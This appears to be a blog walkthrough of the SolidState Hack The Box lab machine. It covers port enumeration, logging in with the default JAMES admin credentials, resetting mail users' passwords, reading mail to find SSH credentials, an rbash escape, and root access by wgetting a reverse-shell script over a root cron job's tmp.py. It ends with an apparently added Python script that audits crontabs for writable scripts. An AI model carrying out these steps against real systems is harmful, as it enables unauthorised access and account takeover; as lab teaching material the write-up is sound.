SolidState — HTB Walkthrough

Dhanishtha Awasthi
4 min read · Jul 21, 2020


ENUMERATION

Nmap Scan

Service and version scan
Full-port scan
Extra port 4555: service and version scan

HTTP 80 ENUMERATION

Nothing juicy on the website, so I thought of running a gobuster scan and wfuzz to fuzz through directories.

Nothing important here, so let's move on to the other ports.

SMTP ENUMERATION

I tried telnet commands like VRFY solidstate etc., but they didn't work.

Connecting through telnet gives us nothing on port 25.

PORT 4555 ENUMERATION

Connecting to port 4555 with the username and password both set to root, the default for the JAMES server. Then I decided to reset the password of user James and everyone else's.

POP ENUMERATION 110

I tried SSH, but no: we need to connect to the POP server to check mails, which is the right use of the James Mail Server. So we first check the mails for the user James.

I made use of commands from: https://book.hacktricks.xyz/pentesting/pentesting-pop

This did not work, so we will check the mails for everyone.

Log in as each user, one by one.

John

Mindy

Two mails for Mindy. We got SSH creds for mindy.

OK, so I got nothing special from the mails except the SSH credentials. Getting back to exploitation.

Username: mindy && Password: P@55W0rd1!2@

EXPLOITATION

A highly restrictive shell. I think we have to deal with an rbash escape. After enumerating a lot, I found this:

ps -ef : enumeration of running processes

Going to the directory, I see:

Nothing that juicy, so let's just run pspy first to see hidden processes, if any.

Every 4 minutes, root runs a tmp.py. Let's get a reverse shell using the same.

The reverse_shell script:

Now we will wget this script into tmp.py:

wget -O tmp.py http://10.10.14.14:8000/reverse_shell.py

Now start a netcat listener on port 12345.

ROOTED!!!
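
The root step above depends on a script that root runs on a schedule being overwritable by a low-privileged user. Seen from the defender's side, the following is an added example (not part of the original walkthrough) that audits crontab entries for that condition; the function names, the crontab text and the file paths are constructed for illustration, and it assumes the user-crontab format (five schedule fields or an @keyword, then the command).

```python
import os, shlex, stat, tempfile

def cron_script_paths(crontab_text):
    """Return absolute paths named in the command part of each crontab entry."""
    paths = []
    for line in crontab_text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        # "@reboot cmd" has one schedule field, normal entries have five.
        parts = line.split(None, 1 if line.startswith("@") else 5)
        if "=" in parts[0] or len(parts) < (2 if line.startswith("@") else 6):
            continue  # environment assignment or malformed line
        paths += [t for t in shlex.split(parts[-1]) if t.startswith("/")]
    return paths

def replaceable_by_others(path, trusted_uid=0):
    """List the reasons a non-root user could change what root executes."""
    reasons = []
    st = os.stat(path)
    if st.st_uid != trusted_uid:
        reasons.append("owner is not the trusted uid")
    if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
        reasons.append("file is group- or world-writable")
    parent = os.stat(os.path.dirname(path))
    if parent.st_mode & stat.S_IWOTH and not parent.st_mode & stat.S_ISVTX:
        reasons.append("parent directory is world-writable without sticky bit")
    return reasons

def audit(crontab_text, trusted_uid=0):
    """Map each existing path in the crontab to its findings (empty list = fine)."""
    return {p: replaceable_by_others(p, trusted_uid)
            for p in cron_script_paths(crontab_text) if os.path.exists(p)}

def constructed_demo():
    """Build a throwaway directory with one loose and one tight script, then audit it."""
    d = tempfile.mkdtemp()
    loose, tight = os.path.join(d, "tmp.py"), os.path.join(d, "backup.py")
    for path, mode in ((loose, 0o777), (tight, 0o755)):
        with open(path, "w") as fh:
            fh.write("# constructed sample\n")
        os.chmod(path, mode)
    crontab = f"# constructed root crontab\nPATH=/usr/bin\n*/4 * * * * python {loose}\n@reboot {tight}\n"
    return loose, tight, audit(crontab, trusted_uid=os.geteuid())

if __name__ == "__main__":
    for path, reasons in constructed_demo()[2].items():
        print(path, "->", reasons or "ok")
```

On a real host, feed `audit()` the output of `crontab -l` for root and leave `trusted_uid` at 0; any non-empty finding is a file to re-own to root and chmod to 755 or tighter.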
